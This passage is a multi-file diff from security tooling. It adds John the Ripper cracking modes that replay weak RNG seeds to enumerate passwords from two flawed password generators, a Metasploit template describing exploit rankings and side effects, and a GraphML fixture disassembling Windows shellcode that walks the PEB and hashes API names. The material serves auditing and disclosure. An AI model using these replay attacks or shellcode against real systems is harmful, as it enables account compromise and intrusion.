+int charset_length, password_length, endTime, startTime, msec;
+
+void init()
+{
+	password_length = 8;	/* Change this to match config */
+	endTime = session_start_time;
+	startTime = 1343743200;	/* Aug 1 2012  - Change this as necessary */
+
+	msec = 1;		/* msec is never 0 - it would crash the applet */
+
+	charset_length = 0;
+	int c;
+
+	/* Comment out classes that you don't need, but keep the order the same */
+	/* Lowers */
+	c = 'a'; while (c <= 'z') charset[charset_length++] = c++;
+
+	/* Uppers */
+	c = 'A'; while (c <= 'Z') charset[charset_length++] = c++;
+
+	/* Numbers */
+	c = '0'; while (c <= '9') charset[charset_length++] = c++;
+	charset[charset_length++] = '0';	/* Yep, it's there twice */
+
+	/* Symbols */
+	c = '!'; while (c <= '/') charset[charset_length++] = c++;
+	c = ':'; while (c <= '@') charset[charset_length++] = c++;
+	c = '['; while (c <= '`') charset[charset_length++] = c++;
+	c = '{'; while (c <= '~') charset[charset_length++] = c++;
+}
+
+void generate()
+{
+	int i, rand_seed, rand_result;
+
+	/* Terminate once we've generated for all *
+	 * of the time range (Plus a bit more...) */
+	if (endTime + 1000 < startTime) {
+		word = 0;
+		return;
+	}
+
+	/* Skip msecs that would generate dupes */
+	while (endTime % msec != 0) {
+		if (++msec > 999) {
+			endTime--;
+			msec = 1;
+		}
+	}
+
+	rand_seed = endTime / msec;
+
+	i = 0;
+	while (i < password_length) {
+		/* this works like rand_r() from eglibc */
+		rand_seed = rand_seed * 1103515245 + 12345;
+		rand_result = (rand_seed >> 16) & 2047;
+
+		rand_seed = rand_seed * 1103515245 + 12345;
+		rand_result <<= 10;
+		rand_result ^= (rand_seed >> 16) & 1023;
+
+		rand_seed = rand_seed * 1103515245 + 12345;
+		rand_result <<= 10;
+		rand_result ^= (rand_seed >> 16) & 1023;
+
+		word[i++] = charset[rand_result % charset_length];
+	}
+	word[i] = 0;
+
+	if (++msec > 999) {
+		endTime--;
+		msec = 1;
+	}
+}
+
+void restore()
+{
+	int i, rand_seed, rand_result;
+
+	i = 0;
+
+	/* Very crude restore, just dry-run until we hit last word */
+	while (i != password_length) {
+
+		while (endTime % msec != 0) {
+			if (++msec > 999) {
+				endTime--;
+				msec = 1;
+			}
+		}
+
+		rand_seed = endTime / msec;
+
+		i = 0;
+		while (i < password_length) {
+			/* this works like rand_r() from eglibc */
+			rand_seed = rand_seed * 1103515245 + 12345;
+			rand_result = (rand_seed >> 16) & 2047;
+
+			rand_seed = rand_seed * 1103515245 + 12345;
+			rand_result <<= 10;
+			rand_result ^= (rand_seed >> 16) & 1023;
+
+			rand_seed = rand_seed * 1103515245 + 12345;
+			rand_result <<= 10;
+			rand_result ^= (rand_seed >> 16) & 1023;
+
+			if (charset[rand_result % charset_length] != word[i++])
+				break;
+		}
+
+		if (++msec > 999) {
+			endTime--;
+			msec = 1;
+		}
+	}
+}
+
+/* Awesome Password Generator RNG replay
+ * Written by Michael Samuel <mik@miknet.net>
+ * Public Domain.
+ *
+ * This takes advantage of a subtle bug, where a crypto RNG is used to
+ * seed the C# System.Random() class, which takes a 32-bit input, but
+ * converts negative numbers into non-negative numbers, resulting in
+ * only 31 bits of security.
+ *
+ * This only implements "easy to type" being *unticked*, and numbers,
+ * lowers, uppers and symbols being ticked, in random password mode.
+ * Changing the password length is easy, anything else is left as an
+ * exercise to the reader.
+ *
+ * Running Awesome Password Generator (1.3.2 or lower) in Mono is still
+ * vulnerable, but uses a different RNG, so this mode isn't compatible.
+ */
+
+/* Awesome Password Generator 1.3.2 does a two-pass run, selecting which
+ * charset each position will have, then picking the character.  This
+ * leads to heavy bias, and is fixed in 1.4.0 (along with many other
+ * fixes).  If you have been using Awesome Password Generator, you should
+ * upgrade immediately and change your passwords.
+ */
+[List.External:AwesomePasswordGenerator]
+int numbers[10];
+int lowers[26];
+int uppers[26];
+int symbols[32];
+
+/* Since we don't have a double datatype, I simply pre-calculated the
+ * transition numbers calculating the scale formula:
+ * (double)randNum * 4.656612873077393e-10 * {4/10/26/32}
+ */
+int boundaries_charclass[4];
+int boundaries_numbers[10];
+int boundaries_letters[26];
+int boundaries_symbols[32];
+
+/* This is the bug we're exploiting - the seed for the RNG is 32 bits
+ * from the crypto rng.  The non-crypto RNG converts negative numbers
+ * into non-negative numbers, so there's only 2^31 possible seeds.
+ */
+int seed;
+
+int password_length;
+
+void init()
+{
+	password_length = 16; /* Change this to match config */
+
+	int c, i;
+
+	c = '0'; i = 0; while (c <= '9') numbers[i++] = c++;
+	c = 'a'; i = 0; while (c <= 'z') lowers[i++] = c++;
+	c = 'A'; i = 0; while (c <= 'Z') uppers[i++] = c++;
+
+	/* Symbols */
+	i = 0;
+	symbols[i++] = '!'; symbols[i++] = '@'; symbols[i++] = '#'; symbols[i++] = '$';
+	symbols[i++] = '%'; symbols[i++] = '^'; symbols[i++] = '&'; symbols[i++] = '*';
+	symbols[i++] = '('; symbols[i++] = ')'; symbols[i++] = '~'; symbols[i++] = '-';
+	symbols[i++] = '_'; symbols[i++] = '='; symbols[i++] = '+'; symbols[i++] = '\\';
+	symbols[i++] = '|'; symbols[i++] = '/'; symbols[i++] = '['; symbols[i++] = ']';
+	symbols[i++] = '{'; symbols[i++] = '}'; symbols[i++] = ';'; symbols[i++] = ':';
+	symbols[i++] = '`'; symbols[i++] = '\''; symbols[i++] = '"'; symbols[i++] = ',';
+	symbols[i++] = '.'; symbols[i++] = '<'; symbols[i++] = '>'; symbols[i++] = '?';
+
+	i = 0;
+	boundaries_charclass[i++] = 536870912; boundaries_charclass[i++] = 1073741824;
+	boundaries_charclass[i++] = 1610612736; boundaries_charclass[i++] = 2147483647;
+
+	i = 0;
+	boundaries_numbers[i++] = 214748365; boundaries_numbers[i++] = 429496730;
+	boundaries_numbers[i++] = 644245095; boundaries_numbers[i++] = 858993460;
+	boundaries_numbers[i++] = 1073741824; boundaries_numbers[i++] = 1288490189;
+	boundaries_numbers[i++] = 1503238554; boundaries_numbers[i++] = 1717986919;
+	boundaries_numbers[i++] = 1932735284; boundaries_numbers[i++] = 2147483647;
+
+	i = 0;
+	boundaries_letters[i++] = 82595525; boundaries_letters[i++] = 165191050;
+	boundaries_letters[i++] = 247786575; boundaries_letters[i++] = 330382100;
+	boundaries_letters[i++] = 412977625; boundaries_letters[i++] = 495573150;
+	boundaries_letters[i++] = 578168675; boundaries_letters[i++] = 660764200;
+	boundaries_letters[i++] = 743359725; boundaries_letters[i++] = 825955250;
+	boundaries_letters[i++] = 908550775; boundaries_letters[i++] = 991146300;
+	boundaries_letters[i++] = 1073741824; boundaries_letters[i++] = 1156337349;
+	boundaries_letters[i++] = 1238932874; boundaries_letters[i++] = 1321528399;
+	boundaries_letters[i++] = 1404123924; boundaries_letters[i++] = 1486719449;
+	boundaries_letters[i++] = 1569314974; boundaries_letters[i++] = 1651910499;
+	boundaries_letters[i++] = 1734506024; boundaries_letters[i++] = 1817101549;
+	boundaries_letters[i++] = 1899697074; boundaries_letters[i++] = 1982292599;
+	boundaries_letters[i++] = 2064888124; boundaries_letters[i++] = 2147483647;
+
+	i = 0;
+	boundaries_symbols[i++] = 67108864; boundaries_symbols[i++] = 134217728;
+	boundaries_symbols[i++] = 201326592; boundaries_symbols[i++] = 268435456;
+	boundaries_symbols[i++] = 335544320; boundaries_symbols[i++] = 402653184;
+	boundaries_symbols[i++] = 469762048; boundaries_symbols[i++] = 536870912;
+	boundaries_symbols[i++] = 603979776; boundaries_symbols[i++] = 671088640;
+	boundaries_symbols[i++] = 738197504; boundaries_symbols[i++] = 805306368;
+	boundaries_symbols[i++] = 872415232; boundaries_symbols[i++] = 939524096;
+	boundaries_symbols[i++] = 1006632960; boundaries_symbols[i++] = 1073741824;
+	boundaries_symbols[i++] = 1140850688; boundaries_symbols[i++] = 1207959552;
+	boundaries_symbols[i++] = 1275068416; boundaries_symbols[i++] = 1342177280;
+	boundaries_symbols[i++] = 1409286144; boundaries_symbols[i++] = 1476395008;
+	boundaries_symbols[i++] = 1543503872; boundaries_symbols[i++] = 1610612736;
+	boundaries_symbols[i++] = 1677721600; boundaries_symbols[i++] = 1744830464;
+	boundaries_symbols[i++] = 1811939328; boundaries_symbols[i++] = 1879048192;
+	boundaries_symbols[i++] = 1946157056; boundaries_symbols[i++] = 2013265920;
+	boundaries_symbols[i++] = 2080374784; boundaries_symbols[i++] = 2147483647;
+
+	seed = 0;
+}
+
+void generate()
+{
+	int i, j, s, next, nextp, val, bucket, randnum, used_charsets;
+	int seedarray[56];
+
+	/* BEGIN System.Random(seed) */
+	if(seed < 0) {
+		/* Only bother with non-negative integers */
+		word = 0;
+		return;
+	}
+
+	s = 161803398 - seed++;
+	seedarray[55] = s;
+	i = val = 1;
+
+	while(i < 55) {
+		bucket = 21 * i % 55;
+		seedarray[bucket] = val;
+		val = s - val;
+		if(val < 0) val += 2147483647;
+		s = seedarray[bucket];
+		i++;
+	}
+
+	i = 1;
+	while(i < 5) {
+		j = 1;
+		while(j < 56) {
+			seedarray[j] -= seedarray[1 + (j + 30) % 55];
+			if(seedarray[j] < 0) seedarray[j] += 2147483647;
+			j++;
+		}
+		i++;
+	}
+	next = 0;
+	nextp = 21;
+	/* END System.Random(seed) */
+
+	used_charsets = 0;
+	while(used_charsets != 15) {
+		i = 0;
+		while(i < password_length) {
+			/* BEGIN Random.Sample() */
+			if (++next >= 56) next = 1;
+			if (++nextp >= 56) nextp = 1;
+			randnum = seedarray[next] - seedarray[nextp];
+			if (randnum == 2147483647) randnum--;
+			if (randnum < 0) randnum += 2147483647;
+			seedarray[next] = randnum;
+			/* END Random.Sample() */
+
+			j = 0;
+			while(boundaries_charclass[j] < randnum) j++;
+
+			word[i] = j; /* Temporarily store in word[] */
+			used_charsets |= (1 << j);
+			i++;
+		}
+	}
+
+	i = 0;
+	while(i < password_length) {
+		/* BEGIN Random.Sample() */
+		if (++next >= 56) next = 1;
+		if (++nextp >= 56) nextp = 1;
+		randnum = seedarray[next] - seedarray[nextp];
+		if (randnum == 2147483647) randnum--;
+		if (randnum < 0) randnum += 2147483647;
+		seedarray[next] = randnum;
+		/* END Random.Sample() */
+		j = 0;
+
+		if(word[i] == 0) {
+			while(boundaries_letters[j] < randnum) j++;
+			word[i++] = lowers[j];
+		} else if (word[i] == 1) {
+			while(boundaries_letters[j] < randnum) j++;
+			word[i++] = uppers[j];
+		} else if (word[i] == 2) {
+			while(boundaries_numbers[j] < randnum) j++;
+			word[i++] = numbers[j];
+		} else { /* if (word[i] == 3) */
+			while(boundaries_symbols[j] < randnum) j++;
+			word[i++] = symbols[j];
+		}
+	}
+	word[i] = 0;
+}
+
+
+void restore()
+{
+	int i, j, s, next, nextp, val, bucket, randnum, used_charsets;
+	int seedarray[56];
+	int candidate[32]; /* This needs to be at-least as big as password-length */
+
+	seed = 0;
+
+	while(seed > 0) {
+		/* BEGIN System.Random(seed) */
+		s = 161803398 - seed++;
+		seedarray[55] = s;
+		i = val = 1;
+
+		while(i < 55) {
+			bucket = 21 * i % 55;
+			seedarray[bucket] = val;
+			val = s - val;
+			if(val < 0) val += 2147483647;
+			s = seedarray[bucket];
+			i++;
+		}
+
+		i = 1;
+		while(i < 5) {
+			j = 1;
+			while(j < 56) {
+				seedarray[j] -= seedarray[1 + (j + 30) % 55];
+				if(seedarray[j] < 0) seedarray[j] += 2147483647;
+				j++;
+			}
+			i++;
+		}
+		next = 0;
+		nextp = 21;
+		/* END System.Random(seed) */
+
+		used_charsets = 0;
+		while(used_charsets != 15) {
+			i = 0;
+			while(i < password_length) {
+				/* BEGIN Random.Sample() */
+				if (++next >= 56) next = 1;
+				if (++nextp >= 56) nextp = 1;
+				randnum = seedarray[next] - seedarray[nextp];
+				if (randnum == 2147483647) randnum--;
+				if (randnum < 0) randnum += 2147483647;
+				seedarray[next] = randnum;
+				/* END Random.Sample() */
+
+				j = 0;
+				while(boundaries_charclass[j] < randnum) j++;
+
+				candidate[i] = j;
+				used_charsets |= (1 << j);
+				i++;
+			}
+		}
+
+		i = 0;
+		while(i < password_length) {
+			/* BEGIN Random.Sample() */
+			if (++next >= 56) next = 1;
+			if (++nextp >= 56) nextp = 1;
+			randnum = seedarray[next] - seedarray[nextp];
+			if (randnum == 2147483647) randnum--;
+			if (randnum < 0) randnum += 2147483647;
+			seedarray[next] = randnum;
+			/* END Random.Sample() */
+			j = 0;
+
+			if(candidate[i] == 0) {
+				while(boundaries_letters[j] < randnum) j++;
+				if(lowers[j] != word[i++]) break;
+			} else if (candidate[i] == 1) {
+				while(boundaries_letters[j] < randnum) j++;
+				if(uppers[j] != word[i++]) break;
+			} else if (candidate[i] == 2) {
+				while(boundaries_numbers[j] < randnum) j++;
+				if(numbers[j] != word[i++]) break;
+			} else { /* if (word[i] == 3) */
+				while(boundaries_symbols[j] < randnum) j++;
+				if(symbols[j] != word[i++]) break;
+			}
+		}
+		if(i == password_length) return;
+	}
+}
+
+# Append the Luhn algorithm digit to arbitrary all-digit strings.  Optimized
+# for speed, not for size nor simplicity.  The primary optimization trick is to
+# compute the length and four sums in parallel (in two SIMD'ish variables).
+# Then whether the length is even or odd determines which two of the four sums
+# are actually used.  Checks for non-digits and for NUL are packed into the
+# SIMD'ish bitmasks as well.
+[List.External:AppendLuhn]
+int map1[0x100], map2[0x1fff];
+
+void init()
+{
+	int i;
+
+	map1[0] = ~0x7fffffff;
+	i = 1;
+	while (i < 0x100)
+		map1[i++] = ~0x7effffff;
+	i = -1;
+	while (++i < 10)
+		map1['0' + i] = i + ((i * 2 % 10 + i / 5) << 12);
+	i = -1;
+	while (++i < 0x1fff) {
+		if (i % 10)
+			map2[i] = '9' + 1 - i % 10;
+		else
+			map2[i] = '0';
+	}
+}
+
+void filter()
+{
+	int i, o, e;
+
+	i = o = e = 0;
+	while ((o += map1[word[i++]]) >= 0) {
+		if ((e += map1[word[i++]]) >= 0)
+			continue;
+		if (e & 0x01000000)
+			return; // Not all-digit, leave unmodified
+		word[i--] = 0;
+		word[i] = map2[(e & 0xfff) + (o >> 12)];
+		return;
+	}
+	if (o & 0x01000000)
+		return; // Not all-digit, leave unmodified
+	word[i--] = 0;
+	word[i] = map2[(o & 0xfff) + (e >> 12)];
+}
+
 # Simple password policy matching: require at least one digit.
 [List.External:AtLeast1-Simple]
 void filter()
@@ -3398,55 +3527,6 @@ void filter()
 		word = 0; // Does not conform to policy
 }

-# Append the Luhn algorithm digit to arbitrary all-digit strings.  Optimized
-# for speed, not for size nor simplicity.  The primary optimization trick is to
-# compute the length and four sums in parallel (in two SIMD'ish variables).
-# Then whether the length is even or odd determines which two of the four sums
-# are actually used.  Checks for non-digits and for NUL are packed into the
-# SIMD'ish bitmasks as well.
-[List.External:AppendLuhn]
-int map1[0x100], map2[0x1fff];
-
-void init()
-{
-	int i;
-
-	map1[0] = ~0x7fffffff;
-	i = 1;
-	while (i < 0x100)
-		map1[i++] = ~0x7effffff;
-	i = -1;
-	while (++i < 10)
-		map1['0' + i] = i + ((i * 2 % 10 + i / 5) << 12);
-	i = -1;
-	while (++i < 0x1fff) {
-		if (i % 10)
-			map2[i] = '9' + 1 - i % 10;
-		else
-			map2[i] = '0';
-	}
-}
-
-void filter()
-{
-	int i, o, e;
-
-	i = o = e = 0;
-	while ((o += map1[word[i++]]) >= 0) {
-		if ((e += map1[word[i++]]) >= 0)
-			continue;
-		if (e & 0x01000000)
-			return; // Not all-digit, leave unmodified
-		word[i--] = 0;
-		word[i] = map2[(e & 0xfff) + (o >> 12)];
-		return;
-	}
-	if (o & 0x01000000)
-		return; // Not all-digit, leave unmodified
-	word[i--] = 0;
-	word[i] = map2[(o & 0xfff) + (e >> 12)];
-}
-
 # Trivial Rotate function, which rotates letters in a word
 # by a given number of places (like 13 in case of ROT13).
 # Words which don't contain any letters (and thus wouldn't be changed
@@ -3892,7 +3972,8 @@ void next()
 .include '$JOHN/john-local.conf'

 # include john-local.conf in local dir, it can override john.conf, john-local.conf (or any other conf file loaded)
-.include './john-local.conf'
+# This is disabled by default since it's a security risk in case JtR is ever run with untrusted current directory
+#.include './john-local.conf'

 # End of john.conf file.
 # Keep this comment, and blank line above it, to make sure a john-local.conf
@@ -15,20 +15,103 @@
 <% end %>

 ## Module Ranking
+<%# https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking %>

-<%= normalize_rank(items[:mod_rank]) %>
+**<%= items[:mod_rank_name] %>**

-## Side Effects
+<% if items[:mod_rank_name] == "Excellent" %>
+> The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical
+> memory corruption exploits should be given this ranking unless there are extraordinary circumstances.

-<%= normalize_side_effects(items[:mod_side_effects]) %>
+<% elsif items[:mod_rank_name] == "Great" %>
+> The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return
+> address AFTER a version check.

-## Reliability
+<% elsif items[:mod_rank_name] == "Good" %>
+> The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a
+> desktop app, 2012 for server, etc).

-<%= normalize_reliability(items[:mod_reliability]) %>
+<% elsif items[:mod_rank_name] == "Normal" %>
+> The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect.

-## Stability
+<% elsif items[:mod_rank_name] == "Average" %>
+> The exploit is generally unreliable or difficult to exploit.

-<%= normalize_stability(items[:mod_stability]) %>
+<% elsif items[:mod_rank_name] == "Low" %>
+> The exploit is nearly impossible to exploit (or under 50% success rate) for common platforms.
+
+<% elsif items[:mod_rank_name] == "Manual" %>
+> The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has
+> no use unless specifically configured by the user (e.g.: [exploit/windows/smb/psexec][1]).
+
+<% end %>
+
+## Module Traits
+<%# https://github.com/rapid7/metasploit-framework/wiki/Definition-of-Module-Reliability,-Side-Effects,-and-Stability %>
+
+<% unless items[:mod_side_effects].empty? %>
+### Side Effects
+
+<% items[:mod_side_effects].each do |side_effect| %>
+<% if side_effect == "artifacts-on-disk" %>
+<% description = "Modules leaves a payload or a dropper on the target machine." %>
+<% elsif side_effect == "config-changes" %>
+<% description = "Module modifies some configuration setting on the target machine." %>
+<% elsif side_effect == "ioc-in-logs" %>
+<% description = "Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log)." %>
+<% elsif side_effect == "account-lockouts" %>
+<% description = "Module may cause account lockouts (likely due to brute-forcing)." %>
+<% elsif side_effect == "screen-effects" %>
+<% description = "Module may show something on the screen (Example: a window pops up)." %>
+<% elsif side_effect == "audio-effects" %>
+<% description = "Module may cause a noise (Examples: audio output from the speakers or hardware beeps)." %>
+<% elsif side_effect == "physical-effects" %>
+<% description = "Module may produce physical effects (Examples: the device makes movement or flashes LEDs)." %>
+<% end %>
+
+* **<%= side_effect %>:** <%= description %>
+<% end %>
+<% end %>
+
+<% unless items[:mod_reliability].empty? %>
+### Reliability
+
+<% items[:mod_reliability].each do |reliability| %>
+<% if reliability == "first-attempt-fail" %>
+<% description = "The module tends to fail to get a session on the first attempt." %>
+<% elsif reliability == "repeatable-session" %>
+<% description = "The module is expected to get a shell every time it runs." %>
+<% elsif reliability == "unreliable-session" %>
+<% description = "The module isn't expected to get a shell reliably (such as only once)." %>
+<% end %>
+
+* **<%= reliability %>:** <%= description %>
+<% end %>
+<% end %>
+
+<% unless items[:mod_stability].empty? %>
+### Stability
+
+<% items[:mod_stability].each do |stability| %>
+<% if stability == "crash-safe" %>
+<% description = "Module should not crash the service." %>
+<% elsif stability == "crash-service-restarts" %>
+<% description = "Module may crash the service, but the service restarts." %>
+<% elsif stability == "crash-service-down" %>
+<% description = "Module may crash the service, and the service remains down." %>
+<% elsif stability == "crash-os-restarts" %>
+<% description = "Module may crash the OS, but the OS restarts." %>
+<% elsif stability == "crash-os-down" %>
+<% description = "Module may crash the OS, and the OS remains down." %>
+<% elsif stability == "service-resource-loss" %>
+<% description = "Module may cause a resource (such as a file or data in a database) to be unavailable for the service." %>
+<% elsif stability == "os-resource-loss" %>
+<% description = "Modules may cause a resource (such as a file) to be unavailable for the OS." %>
+<% end %>
+
+* **<%= stability %>:** <%= description %>
+<% end %>
+<% end %>

 ## Related Pull Requests

@@ -49,12 +132,18 @@

 ## Required Options

-<% if normalize_options(items[:mod_options]).empty? %>
-No options required.
+<% if items[:mod_options].empty? %>
+No options are required.
 <% else %>
-<%= normalize_options(items[:mod_options]) %>
+<% items[:mod_options].each_pair do |name, props| %>
+<% if props.required && props.default.nil? %>
+* **<%= name %>:** <%= props.desc %>
+<% end %>
+<% end %>
 <% end %>

 ## Basic Usage

 <%= normalize_demo_output(items[:mod_demo]) %>
+
+[1]: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/psexec.rb
@@ -0,0 +1,664 @@
+<?xml version="1.0" ?>
+<graphml xmlns="http://graphml.graphdrawing.org/xmlns" xmlns:xsi="http://graphml.graphdrawing.org/xmlns" xsi:schemaLocation="http://graphml.graphdrawing.org/xmlns http://graphml.graphdrawing.org/xmlns/1.0/graphml.xsd">
+  <key id="address" for="all" attr.name="address" attr.type="long"/>
+  <key id="type" for="all" attr.name="type" attr.type="string"/>
+  <key id="instruction.source" for="node" attr.name="instruction.source" attr.type="string"/>
+  <key id="instruction.hex" for="node" attr.name="instruction.hex" attr.type="string"/>
+  <graph edgedefault="directed">
+    <node id="block.0x1000">
+      <data key="address">0x1000</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1000</data>
+        <data key="type">block</data>
+        <node id="block.0x1000:instruction.0x1000">
+          <data key="address">0x1000</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4151</data>
+          <data key="instruction.source">push r9</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1002">
+          <data key="address">0x1002</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4150</data>
+          <data key="instruction.source">push r8</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1004">
+          <data key="address">0x1004</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">52</data>
+          <data key="instruction.source">push rdx</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1005">
+          <data key="address">0x1005</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">51</data>
+          <data key="instruction.source">push rcx</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1006">
+          <data key="address">0x1006</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">56</data>
+          <data key="instruction.source">push rsi</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1007">
+          <data key="address">0x1007</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4831d2</data>
+          <data key="instruction.source">xor rdx, rdx</data>
+        </node>
+        <node id="block.0x1000:instruction.0x100a">
+          <data key="address">0x100a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">65488b5260</data>
+          <data key="instruction.source">mov rdx, qword ptr gs:[rdx + 0x60]</data>
+        </node>
+        <node id="block.0x1000:instruction.0x100f">
+          <data key="address">0x100f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b5218</data>
+          <data key="instruction.source">mov rdx, qword ptr [rdx + 0x18]</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1013">
+          <data key="address">0x1013</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b5220</data>
+          <data key="instruction.source">mov rdx, qword ptr [rdx + 0x20]</data>
+        </node>
+        <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x1002"/>
+        <edge source="block.0x1000:instruction.0x1002" target="block.0x1000:instruction.0x1004"/>
+        <edge source="block.0x1000:instruction.0x1004" target="block.0x1000:instruction.0x1007"/>
+        <edge source="block.0x1000:instruction.0x1004" target="block.0x1000:instruction.0x1005"/>
+        <edge source="block.0x1000:instruction.0x1005" target="block.0x1000:instruction.0x1006"/>
+        <edge source="block.0x1000:instruction.0x1007" target="block.0x1000:instruction.0x100a"/>
+        <edge source="block.0x1000:instruction.0x100a" target="block.0x1000:instruction.0x100f"/>
+        <edge source="block.0x1000:instruction.0x100f" target="block.0x1000:instruction.0x1013"/>
+      </graph>
+    </node>
+    <node id="block.0x1017">
+      <data key="address">0x1017</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1017</data>
+        <data key="type">block</data>
+        <node id="block.0x1017:instruction.0x1017">
+          <data key="address">0x1017</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b7250</data>
+          <data key="instruction.source">mov rsi, qword ptr [rdx + 0x50]</data>
+        </node>
+        <node id="block.0x1017:instruction.0x101b">
+          <data key="address">0x101b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">480fb74a4a</data>
+          <data key="instruction.source">movzx rcx, word ptr [rdx + 0x4a]</data>
+        </node>
+        <node id="block.0x1017:instruction.0x1020">
+          <data key="address">0x1020</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4d31c9</data>
+          <data key="instruction.source">xor r9, r9</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x1023">
+      <data key="address">0x1023</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1023</data>
+        <data key="type">block</data>
+        <node id="block.0x1023:instruction.0x1023">
+          <data key="address">0x1023</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4831c0</data>
+          <data key="instruction.source">xor rax, rax</data>
+        </node>
+        <node id="block.0x1023:instruction.0x1026">
+          <data key="address">0x1026</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ac</data>
+          <data key="instruction.source">lodsb al, byte ptr [rsi]</data>
+        </node>
+        <node id="block.0x1023:instruction.0x1027">
+          <data key="address">0x1027</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3c61</data>
+          <data key="instruction.source">cmp al, 0x61</data>
+        </node>
+        <node id="block.0x1023:instruction.0x1029">
+          <data key="address">0x1029</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7c02</data>
+          <data key="instruction.source">jl 0x102d</data>
+        </node>
+        <edge source="block.0x1023:instruction.0x1023" target="block.0x1023:instruction.0x1026"/>
+        <edge source="block.0x1023:instruction.0x1026" target="block.0x1023:instruction.0x1027"/>
+        <edge source="block.0x1023:instruction.0x1027" target="block.0x1023:instruction.0x1029"/>
+      </graph>
+    </node>
+    <node id="block.0x102b">
+      <data key="address">0x102b</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x102b</data>
+        <data key="type">block</data>
+        <node id="block.0x102b:instruction.0x102b">
+          <data key="address">0x102b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">2c20</data>
+          <data key="instruction.source">sub al, 0x20</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x102d">
+      <data key="address">0x102d</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x102d</data>
+        <data key="type">block</data>
+        <node id="block.0x102d:instruction.0x102d">
+          <data key="address">0x102d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">41c1c90d</data>
+          <data key="instruction.source">ror r9d, 0xd</data>
+        </node>
+        <node id="block.0x102d:instruction.0x1031">
+          <data key="address">0x1031</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4101c1</data>
+          <data key="instruction.source">add r9d, eax</data>
+        </node>
+        <node id="block.0x102d:instruction.0x1034">
+          <data key="address">0x1034</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e2ed</data>
+          <data key="instruction.source">loop 0x1023</data>
+        </node>
+        <edge source="block.0x102d:instruction.0x102d" target="block.0x102d:instruction.0x1031"/>
+        <edge source="block.0x102d:instruction.0x1031" target="block.0x102d:instruction.0x1034"/>
+      </graph>
+    </node>
+    <node id="block.0x1036">
+      <data key="address">0x1036</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1036</data>
+        <data key="type">block</data>
+        <node id="block.0x1036:instruction.0x1036">
+          <data key="address">0x1036</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">52</data>
+          <data key="instruction.source">push rdx</data>
+        </node>
+        <node id="block.0x1036:instruction.0x1037">
+          <data key="address">0x1037</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4151</data>
+          <data key="instruction.source">push r9</data>
+        </node>
+        <node id="block.0x1036:instruction.0x1039">
+          <data key="address">0x1039</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b5220</data>
+          <data key="instruction.source">mov rdx, qword ptr [rdx + 0x20]</data>
+        </node>
+        <node id="block.0x1036:instruction.0x103d">
+          <data key="address">0x103d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b423c</data>
+          <data key="instruction.source">mov eax, dword ptr [rdx + 0x3c]</data>
+        </node>
+        <node id="block.0x1036:instruction.0x1040">
+          <data key="address">0x1040</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4801d0</data>
+          <data key="instruction.source">add rax, rdx</data>
+        </node>
+        <node id="block.0x1036:instruction.0x1043">
+          <data key="address">0x1043</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">668178180b02</data>
+          <data key="instruction.source">cmp word ptr [rax + 0x18], 0x20b</data>
+        </node>
+        <node id="block.0x1036:instruction.0x1049">
+          <data key="address">0x1049</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7572</data>
+          <data key="instruction.source">jne 0x10bd</data>
+        </node>
+        <edge source="block.0x1036:instruction.0x1036" target="block.0x1036:instruction.0x1039"/>
+        <edge source="block.0x1036:instruction.0x1036" target="block.0x1036:instruction.0x1037"/>
+        <edge source="block.0x1036:instruction.0x1037" target="block.0x1036:instruction.0x1049"/>
+        <edge source="block.0x1036:instruction.0x1039" target="block.0x1036:instruction.0x103d"/>
+        <edge source="block.0x1036:instruction.0x1039" target="block.0x1036:instruction.0x1040"/>
